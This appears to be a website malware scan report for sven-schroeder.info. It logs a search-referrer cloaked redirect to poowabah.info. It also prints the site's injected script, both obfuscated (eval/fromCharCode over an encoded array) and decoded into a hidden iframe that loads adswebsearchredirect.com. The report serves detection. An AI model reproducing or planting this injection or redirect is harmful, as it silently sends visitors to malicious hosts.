Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://sven-schroeder.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: sven-schroeder.info Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Sep 2014 20:18:26 GMT Location: http://poowabah.info/counter.php Server: Apache Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://sven-schroeder.info/ | 200 OK Content-Length: 5384 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: adswebsearchredirect.com if(window.document)aa=(Number+'4732').substr(0,4);aaa=(Date+{}).substr(0,4);if(aa===aaa){ss=new String();s=String;12-function(){e=window['e'+'v'+'a'+'l'];f='fr';f=f+'omCha'.concat('rC','o','d','e');}();t='q';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5q4.5q52.5q51q16q20q50q55.5q49.5q58.5q54.5q50.5q55q58q23q51.5q50.5q58q34.5q54q50.5q54.5q50.5q55q58q57.5q33q60.5q42q48.5q51.5q39q48.5q54.5q50.5q20q19.5q49q55.5q50q60.5q19.5q20.5q45.5q24q46. ...[2293 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://adswebsearchredirect.com/ads/stat.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('bo ...[803 bytes skipped]... | ||
http://sven-schroeder.info/test404page.js | 404 Not Found Content-Length: 619 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sven-schroeder.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sven-schroeder.info/
Result: sven-schroeder.info is not infected or malware details are not published yet.
Result: sven-schroeder.info is not infected or malware details are not published yet.